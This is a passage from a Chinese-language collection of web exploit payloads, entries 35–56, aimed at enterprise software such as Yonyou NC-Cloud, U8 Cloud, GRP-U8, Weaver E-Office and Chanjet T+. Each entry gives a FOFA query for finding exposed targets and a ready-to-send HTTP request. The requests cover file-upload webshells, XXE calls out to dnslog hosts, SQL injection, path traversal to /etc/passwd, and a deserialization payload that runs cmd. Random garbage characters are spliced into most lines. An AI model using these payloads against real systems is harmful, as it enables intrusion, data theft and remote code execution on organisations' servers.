Accept: */*0 I! L# F" F# m! O% I
Connection: keep-alive2 ^/ G2 y( t+ |, N0 ?1 F4 ~
% Q2 V' K" K/ m' O/ F9 p' I. H1 u
! ^8 a! \. `# M5 g% k. L; L/ n& A
35. 用友NC-Cloud importhttpscer任意文件上传' o I. m; j& I
FOFA:app="用友-NC-Cloud") i; E( b7 r7 S) a) |7 Q+ X$ w
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
1 }/ d* `. q& H7 B! B \Host: 203.25.218.166:8888' m: I7 m& }. [
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info3 D" J9 V8 y9 Z) i2 i$ j
Accept-Encoding: gzip, deflate. ^5 g+ Y5 F. X" l% K
Accept: */*
& a- Z* k8 C0 Y8 {$ iConnection: close7 [4 @( L8 v0 I4 S
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA+ J6 \( }% d" G V
Content-Length: 190' R/ ]0 I1 {$ o6 _" s! \
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
7 {- h% ~4 I3 B; \
) Q4 q1 ?$ E, h( p/ `# N--fd28cb44e829ed1c197ec3bc71748df0
* n% @( z. S$ a. U& K# H5 UContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp": w$ @- Q- M6 k7 Y
% X0 _- B* l* a! ~1 Y, |1 x9 R" k, t" D<%out.println(1111*1111);%>8 L* k) h; y* q" w" u! P6 a/ P5 n
--fd28cb44e829ed1c197ec3bc71748df0--7 l9 Y" O; b+ M& M7 n; s/ {( [! M
: W" p( g/ c! z- s9 `0 n0 n" ?+ N
# g# m- N* ^' {6 \/ M
36. 用友NC-Cloud soapFormat XXE
4 \1 q2 t# ]! jFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/", z7 @! e. V+ b1 E" h& V
POST /uapws/soapFormat.ajax HTTP/1.1
/ S! P1 A6 L: f8 z4 iHost: 192.168.40.130:8989+ T3 x8 {; ^' L: t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0! w9 `# `! r9 X$ i8 a
Content-Length: 263
X/ j% m2 v* W% ]4 v5 ~( kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. }6 c' a% O3 m7 `, F2 A; {Accept-Encoding: gzip, deflate Y( J Q8 Y3 s5 ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 s7 q0 d; \! I' d! l+ X
Connection: close- W7 ?& g! |# O: H7 s1 `
Content-Type: application/x-www-form-urlencoded
1 @# D6 |! w/ h, j. q2 f' `# \Upgrade-Insecure-Requests: 1* H' O9 s# E. z) P- o
$ h! ]9 a; n8 ?1 w! I
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a& q+ r2 R( [4 v1 B6 \- \
( X" D% [2 D% d0 e3 w: Z
E- y- ~/ k* U+ L6 U& h0 U
37. 用友NC-Cloud IUpdateService XXE2 g6 Y3 g2 X9 W- N
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"8 m, ^7 g& f/ C. b
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
! n4 o7 [/ t" }0 {Host: 192.168.40.130:8989
8 U7 T! N, W8 E' c7 SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
3 H$ y$ K/ b. C- \, _Content-Length: 421
7 e" D; o8 @$ X( I$ i8 pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.97 ~( x5 U; |; |( f) b
Accept-Encoding: gzip, deflate
; u# A3 @" b) S7 A" _' ^5 G0 XAccept-Language: zh-CN,zh;q=0.9) o, e: A( u/ h' J3 m+ v
Connection: close8 F1 M# n/ m' z$ I7 O6 b5 Y
Content-Type: text/xml;charset=UTF-82 L* Y7 F S- q) p" j
SOAPAction: urn:getResult
/ a# c4 }7 g% g( r; o1 `Upgrade-Insecure-Requests: 1
& W f9 y; Q- Y5 F' o+ C8 y$ F7 W+ `8 {) c" J
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">6 T' K5 j0 v6 f
<soapenv:Header/>+ K- F/ t- j- e1 A
<soapenv:Body>
: U) B+ [3 B8 O, B. i<iup:getResult>* i7 Y( X1 \' l3 I# g" K
<!--type: string-->
) P7 \& }6 F3 R- J0 i<iup:string><![CDATA[* ^" ]: j; _* Q* A% [
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>5 Z8 T& c4 F3 l& P0 z
<xxx/>]]></iup:string># E5 B( k; c* v
</iup:getResult>
b: g& t+ C$ q5 [1 e: O8 t9 }+ u* F</soapenv:Body>
7 m" }; j6 a5 g' I) M</soapenv:Envelope>
/ w6 J- U' c$ B1 t4 a& p' P; o' R2 I' ]. p
# B' x! `( W' d
3 n; R K+ n, i2 X0 ?- N38. 用友U8 Cloud smartweb2.RPC.d XXE, a" f1 y( I' z/ i* `
FOFA:app="用友-U8-Cloud"1 o' s0 I; i0 W# O' n, t5 J
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
$ ? S8 m2 q& s0 ~Host: 192.168.40.131:8088) p$ g/ W; V* |- L3 c2 |* V( C$ X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
' z( l/ p- c) Q/ ^Content-Length: 260- U) w$ V9 T& P- p9 ?8 K/ r& w: B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
) Z. b S8 N4 s, SAccept-Encoding: gzip, deflate
; p3 b6 j$ z- e' [5 DAccept-Language: zh-CN,zh;q=0.9) j/ X/ |/ B% Q0 B3 }
Connection: close* r1 [, c+ P' z% b+ ^' ]4 m
Content-Type: application/x-www-form-urlencoded
9 B$ k$ w1 _5 H$ p" f- o3 T* {! Z( j, Z# \2 {6 S( R- s
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>4 x& N. |0 ^# K2 k, w/ _( E9 C0 z
: M; _" M7 D9 a& C1 M" g2 V
8 d, c* K8 h; P" P( \! y: T
39. 用友U8 Cloud RegisterServlet SQL注入
j3 Z# d; o: E" TFOFA:title="u8c"
! v6 d' H$ k/ {: v: k: RPOST /servlet/RegisterServlet HTTP/1.11 \6 { P+ w4 Q1 {
Host: 192.168.86.128:8089- n9 F% R0 a" _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
9 G9 \! n: T6 g; c. N1 \5 o7 aConnection: close
# l5 U% N- L+ U$ NContent-Length: 85
. y' ]/ a# u( b# bAccept: */*
+ x' }1 R: ^6 F/ t: O" a0 S+ jAccept-Language: en$ X1 G+ K4 x; t
Content-Type: application/x-www-form-urlencoded
$ q( b% N+ S( U7 L; G; FX-Forwarded-For: 127.0.0.16 Q& C; P" q( w4 |( I# x
Accept-Encoding: gzip
. X& g3 O* y4 e- A- m2 w& d1 Y
- C' z3 S9 O; y5 G- gusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--* e0 B1 M6 j" ]- C6 j. @, R6 ^
# j) }& t) s' @. j1 ^# C
$ J, o% {+ L5 w; d7 c40. 用友U8-Cloud XChangeServlet XXE
! `2 N2 K7 ]5 _1 LFOFA:app="用友-U8-Cloud"/ [5 E: P* N, V+ \: u! o
POST /service/XChangeServlet HTTP/1.17 _5 I* q* k' g* v
Host: x.x.x.x
8 W) y6 E' H+ |0 TUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
2 d/ h0 N ]0 f$ u% n' `3 fContent-Type: text/xml
& y6 b4 u: P, m& f3 k: J4 }: NConnection: close
0 r n! i9 _6 L6 o3 _7 ^
6 K/ b9 T6 g5 @6 w) Y! v<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
, Q. P$ F6 s7 @# @- Z& {2 n& i$ @2 u; i7 a0 Q6 N; j4 | k; x5 a
6 X5 R7 y4 e F7 I
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入/ E8 t& {( d/ N8 {( |4 a
FOFA:app="用友-U8-Cloud"
% w7 t- L# b; {9 {/ f9 b7 zGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
9 _" V/ x9 b4 }. Q- LHost:
( {; o2 k9 s3 x, M) \. c, dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ z2 t, ` ~9 d, i; g: B1 ]Content-Type: application/json3 k2 `! Q7 k/ L+ u. r' |, {
Accept-Encoding: gzip" R* B' ?8 D% S* Y6 h5 e( M# @
Connection: close6 O! ]6 W; z o. G |
4 l( M* ]1 H. s: g1 i X
/ \5 W) S4 O4 _! s, R
42. 用友GRP-U8 SmartUpload01 文件上传- G3 Y. H) w, K* K& i- [) q4 t# z
FOFA:app="用友-GRP-U8"" F% K! W$ f" Q
POST /u8qx/SmartUpload01.jsp HTTP/1.1: P- Q6 b& ~* D
Host: x.x.x.x) J7 X% d2 v8 W/ v4 s: O* t& q
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
0 _$ T ]7 x, S1 Y4 w$ J) B: PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36* x# P8 y& V- d; ]
4 o- h3 ^" g" |* d; q% D/ yPAYLOAD6 N# C+ T! z; Q+ R: D
1 D, k& Q' s# V) F# R% U* `0 |
5 _: v1 Y, E' h' A7 V
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
! W" {' B+ x% ^; [1 P' {% H) a6 |5 _4 t$ U- q" X
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
6 e* e: {+ t$ X" AFOFA:app="用友-GRP-U8"
1 \& E0 L1 [+ u2 t* yPOST /services/userInfoWeb HTTP/1.1
0 r& b7 M5 F+ h& E. HHost: your-ip
! a& p4 y# ?* `. vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.361 I$ X4 {! `, L( D1 f, I
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* i8 L+ F5 Z7 W
Accept-Encoding: gzip, deflate
: M$ |7 e: \* _Accept-Language: zh-CN,zh;q=0.92 B! @% k2 o7 a+ I. u
Connection: close2 c- X1 C. Y+ s7 c: _: ?% F
SOAPAction:
2 H9 y$ _1 F9 c2 zContent-Type: text/xml;charset=UTF-81 b- d- @6 R: g( `6 _+ b" m! \7 k- P
! W7 a" T# f5 B3 m
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">6 t! x: b" t5 ?
<soapenv:Header/>. H# B: i* e/ R4 Y% T, X. l7 P( |
<soapenv:Body>5 S" K" y% ^; ]7 Z8 G) x
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+ {. r$ a7 y% s6 k+ b <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
+ |5 C& U5 {0 e: \" o </ser:getUserNameById>* i' J% X6 p) f( D
</soapenv:Body>
6 S! N1 ~ g- w$ `</soapenv:Envelope>
! g% b* m" [8 M! _2 a1 S& f
& s0 D( a# t1 {
6 C6 Q( {0 W( \/ }* I' E; v/ w4 A44. 用友GRP-U8 bx_dj_check.jsp SQL注入
$ l) A; L) U4 ^/ G% F7 FFOFA:app="用友-GRP-U8"+ G/ l. ~& `3 ]! @ V, ]: c- N
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
) I4 ~$ H1 ^9 t4 Z5 b ^. b: F. kHost: your-ip
' D) |$ K. g- E0 D) x8 x% rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
/ s' z L2 g+ N5 n5 NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; a: {0 f5 ?' A
Accept-Encoding: gzip, deflate3 [ G1 T( Y' d$ K
Accept-Language: zh-CN,zh;q=0.9
* g4 t8 k# ?. M+ c x! [4 h' WConnection: close
! t! o6 R! D. ]" }+ ?. Z
2 @1 E/ Z/ P8 `3 r" f8 u
1 F5 h8 V% \$ y/ |! B. [ A45. 用友GRP-U8 ufgovbank XXE
5 P8 z o; O5 S! G) E# k4 hFOFA:app="用友-GRP-U8", Y6 l" K. F, v# M8 u8 a+ y/ |5 w& a
POST /ufgovbank HTTP/1.1
8 s8 l3 ]6 F; o1 z- ?) p7 IHost: 192.168.40.130:222
, r7 }1 q2 o/ D+ sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
, J+ |$ X6 L) D0 F5 R7 J- fConnection: close$ N8 c2 J- M, I! x m& ?3 C; X4 _
Content-Length: 161
/ R9 c" v1 J* \7 P" D, g, V& w _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) m! `7 |6 |- }( sAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( J, B6 O4 V3 A' n7 [7 D3 H
Content-Type: application/x-www-form-urlencoded7 z U. @# q( @$ [" A
Accept-Encoding: gzip
* G( N, d4 h5 K9 s9 d
a) I) g+ w# ^+ A' m4 [6 greqData=<?xml version="1.0"?>- z0 H8 |4 G J' u/ @
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
, \/ `" @! ?: g3 U# w0 B
1 n7 s+ G6 Z) R8 F3 P3 x! t P m& b k$ Q* j" y' a* U* v
46. 用友GRP-U8 sqcxIndex.jsp SQL注入# a% Q% ^" U. H/ b# K. V/ l
FOFA:app="用友-GRP-U8"" u" r+ P3 ?$ K0 R& V
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
" `& a6 N6 w' w4 ] |- v) G( ^. SHost: your-ip
! @. C, u/ d6 \3 P6 x6 u- y( }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
1 Z; F$ u% C7 M8 R+ N) P. ?8 CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 Y! g {. n9 p4 n& g l1 e+ e
Accept-Encoding: gzip, deflate' h. B% g' b5 r3 B6 b
Accept-Language: zh-CN,zh;q=0.99 O! V. [* l) h- Z3 D
Connection: close3 I* l2 z: L, V+ t, j
4 Z% l) f! h3 f& U
6 G2 o$ c, W- z) `
47. 用友GRP A++Cloud 政府财务云 任意文件读取
; M( d. E8 n- ~5 R% Z, g% DFOFA:body="/pf/portal/login/css/fonts/style.css"6 h& P% {" u, ^& b0 Z
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
- i0 Q( M. J, O! Y! D. A0 c/ ]Host: x.x.x.x6 p4 `+ R0 E! b+ J* ?7 z
Cache-Control: max-age=0/ J+ }9 u! R! f4 v+ k
Upgrade-Insecure-Requests: 1& Q" I1 t8 P; z, L: A2 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36# w8 i& C$ n6 O$ z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 s. p1 g' t% k
Accept-Encoding: gzip, deflate, br
2 R/ A* O2 {( F+ eAccept-Language: zh-CN,zh;q=0.9$ Q4 O! U, w( M! ?
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
' h3 P, k1 q$ c8 g2 h: k7 |, OConnection: close
4 n) x- ?- O+ P$ S7 n; U; l! [ L3 u# @" U3 q; i! o
- h) a" F% ]7 D+ ^$ P/ a
+ j2 S5 u9 Z) z, E3 i48. 用友U8 CRM swfupload 任意文件上传: g3 z. _' @/ o% R6 _) i. A
FOFA:title="用友U8CRM"6 g. n- C: J1 w1 p3 ~! L1 _0 I
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1& i! C, C( C$ X7 }9 c
Host: your-ip" A4 _4 f; E& A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0; G1 Z2 Y! V5 v3 d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 W; W `9 v# H6 p+ {5 U% L, g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) J" A- k# i) G. p0 r
Accept-Encoding: gzip, deflate; {- V: I5 R. [% {2 Q; x6 \& ^. R2 G
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
. w9 P3 U! |+ q3 f------269520967239406871642430066855
' a0 z X! _ w2 P/ p; z: YContent-Disposition: form-data; name="file"; filename="s.php"/ _# @" ]4 A* V6 r# N* _* e* b2 d# A
1231
5 M7 M3 w4 ~( v5 `2 L) l0 kContent-Type: application/octet-stream4 a& \7 o9 y A+ a) k2 L
------269520967239406871642430066855
9 `3 V& }2 K! k+ }. N% t! hContent-Disposition: form-data; name="upload"' C+ T/ C9 q7 f6 D
upload1 z7 s9 Q4 a+ X
------269520967239406871642430066855--! I" v% B/ q+ }& g) Y
& b2 g0 I) ?* `0 T2 p, A. M: N- Z* ]+ F
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
3 r, v7 [/ e3 e% _: wFOFA:body="用友U8CRM"
% f) C8 G- p: P+ ?5 p$ d' k x! @# n0 Q
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
. {6 n! f0 j9 u# {7 h1 LHost: x.x.x.x
; ?& @' B6 c" n8 h9 i) f; {% EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 C5 @% }) L, f& E, rContent-Length: 329
9 s* @2 ?6 Q3 I5 }+ s3 nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% ?( K; A$ N& f0 d3 z: HAccept-Encoding: gzip, deflate
9 S9 c8 R8 e+ \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 x0 q/ h$ k; M7 P# t. Q- i& t
Connection: close. w8 a1 S% F; i- F$ K
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w6 n% x, z6 ], i% c7 R, b
8 j! H. H, Z1 p1 |5 M$ H& U-----------------------------vvv3wdayqv3yppdxvn3w. ?" I$ A, o; b8 v* z
Content-Disposition: form-data; name="file"; filename="%s.php "% K1 r Y% r' e* p6 ^
Content-Type: application/octet-stream. F* f; [. P# t0 p Q! X6 B- |% z1 ~& O
' r1 J* B, ^# j: z. R5 ]wersqqmlumloqa6 K+ n% B( c: x0 k( q! [2 l, S
-----------------------------vvv3wdayqv3yppdxvn3w
' @/ _2 c) W. \3 I# g9 V, e, mContent-Disposition: form-data; name="upload"
0 x h' `% Y/ z. x, v
9 ~9 e/ g% s* @; Q8 ~( T* cupload- d! s) P! ?/ _( u1 R% j
-----------------------------vvv3wdayqv3yppdxvn3w--9 B+ O! U8 o' }
) M# N2 k v m: j1 O* \3 k; L+ d* D
9 u3 V- C- P' H5 a
http://x.x.x.x/tmpfile/updB3CB.tmp.php, x4 m, n4 w; y, Q- I
' X1 P( @- ~( E50. QDocs Smart School 6.4.1 filterRecords SQL注入
! f" z* \* G/ i1 s0 LFOFA:body="close closebtnmodal"# [2 T2 X! Z+ ]
POST /course/filterRecords/ HTTP/1.15 A5 A+ ~6 d! b. s
Host: x.x.x.x, r% w& ^- Y. w3 ^9 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
# y& |( V5 E: ]4 N) dConnection: close
. ?; g5 s, f$ J4 v: M( WContent-Length: 224: Z1 ]0 [: n2 }2 b
Accept: */*! D i) S+ h& M( X- s
Accept-Language: en6 J3 ]. X5 q- n d% Y' L/ x
Content-Type: application/x-www-form-urlencoded
, m3 `) Q+ O) _+ kAccept-Encoding: gzip' ?7 f& w0 `9 ]$ `
: q p& _. K+ k) x$ C; v wsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
) w5 v/ _6 e8 a( @6 }2 q6 f: t- R; C4 a p* t; s' Y
0 u5 e7 R& O, X* z& {) P51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
0 z# N( H/ x! p5 KFOFA:app="云时空社会化商业ERP系统"
$ Z6 @5 _ F0 q# Z9 D8 s6 _GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
' Q) {5 ?" f: Q) [- PHost: your-ip
2 Z( k9 N7 B b5 v0 z' F+ NUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
/ N& B0 y3 ?1 V+ ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
8 `, y4 p. i' \; k' t/ [0 u/ l0 rAccept-Encoding: gzip, deflate
f% l) j# v* `# R; F( VAccept-Language: zh-CN,zh;q=0.9: u! {3 T9 A; h: Z) d
Connection: close, l- o j: n3 \0 t2 f t
5 O. ~( E0 ^" ^( I9 ?( l1 S# Q2 S9 C( A
52. 泛微E-Office json_common.php sql注入8 {+ O; @. [; V
FOFA:app="泛微-EOffice"
H; \ M' I, ~' p3 s- vPOST /building/json_common.php HTTP/1.1
' {' T9 M) l, y* G. U; MHost: 192.168.86.128:8097: A, L+ r% [- N
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36* a+ U: f4 a8 ]( H5 ?" \
Connection: close. s! `& i& B# @/ d- h1 t8 H( j8 u2 U
Content-Length: 87
* e( O1 b; B% f7 S! FAccept: */*
3 x! }6 X: f, o: i" K7 Z1 G, ~ \Accept-Language: en
& H: t& l8 `4 \. U& s0 }2 N+ @, EContent-Type: application/x-www-form-urlencoded( i, z0 M. c) z0 `# B. B
Accept-Encoding: gzip
5 ]! V& w g- M/ z4 F! X* w( N8 J- f$ @/ d7 _
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3337 ?% D1 A) |: A6 E' |& r
7 X+ ^9 z: r3 e, {) T
. \5 G6 M3 t: F& ]" c53. 迪普 DPTech VPN Service 任意文件上传
, d4 \/ ?8 ~3 H e" UFOFA:app="DPtech-SSLVPN") u6 m+ F3 u! u; T V& B
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
* G% Y9 _7 m+ Q) i, U: I% g, H. ] v+ h4 Y d. a/ z3 S4 R
+ U4 P8 G/ v# |6 O54. 畅捷通T+ getstorewarehousebystore 远程代码执行9 w. L9 u& h I7 x; h' h1 O( C
FOFA:app="畅捷通-TPlus"
4 o2 V. b! m( L: @* _$ b. G第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件/ z0 {6 K4 @$ K: T$ i
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
( [- J' F5 W+ I3 m9 y0 b4 F2 S5 j: x
( T8 o% H+ P7 F, V. y' d& }
完整数据包* J _. o: f) e0 r% v- D" ~
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
0 X7 \9 N: A" A* F* HHost: x.x.x.x: h" _- ], N9 o/ g/ K! z' K
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F0 z" [$ E/ a8 u% @# s! A2 i1 P
Content-Length: 593
, M7 o/ M$ _# [. H& v
+ D/ _/ x6 o' l; J5 b: x. u E5 f1 T{
- }7 E( K+ ]1 h9 n* s+ o) B"storeID":{
1 m5 f7 X. L4 T' d+ a "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
# t8 K9 Q* [5 L! A+ n "MethodName":"Start",1 o- X) {3 k" A. X
"ObjectInstance":{
6 p- f; q; @9 r/ m! e( ?. H) Y7 B "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
- Y! y& N4 q# x3 `& y' m2 l "StartInfo":{
( Q) P+ S: f: g$ D "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
) e Y2 y7 F' ~1 c5 Z/ O' F "FileName":"cmd",
& l# @1 z8 ^6 u" _ "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
! r+ p: }7 k$ h0 ? }
/ t+ w' `# T1 D; J4 }' Q }$ j% C( s P/ e6 q' a$ `
}
- L- q; S5 a: i& _, X; w}" p2 P/ X' Y; I7 h. [. u% Z$ T
5 c% U' D. E! W0 F7 ^' B% { X h( p
f) i8 r6 v4 l, S; b& I) A第二步,访问如下url
2 O4 l) Y: l% Q: w, P8 V0 ~( l! Y" y/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
5 T/ t8 P+ `1 c% s
) x( A5 Y9 w6 j( b. u1 e# c4 a' s8 y l8 Z
55. 畅捷通T+ getdecallusers信息泄露7 V- R3 j. @, a$ f5 s/ X7 @
FOFA:app="畅捷通-TPlus"
% u0 u% F+ F+ p% g% V2 V- Y第一步,通过
# c* X4 R& B! ]' L/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
- N5 X$ `" w& l第二步,利用获取到的Cookie请求
( y. n4 n, S3 X. @9 X/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
/ _( r% S' d! o+ R3 u
! w! u& P% Y6 Y* C) ~56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
, _$ ?& L2 O+ U) `FOFA: app="畅捷通-TPlus"$ f: o5 @& a& Q2 V
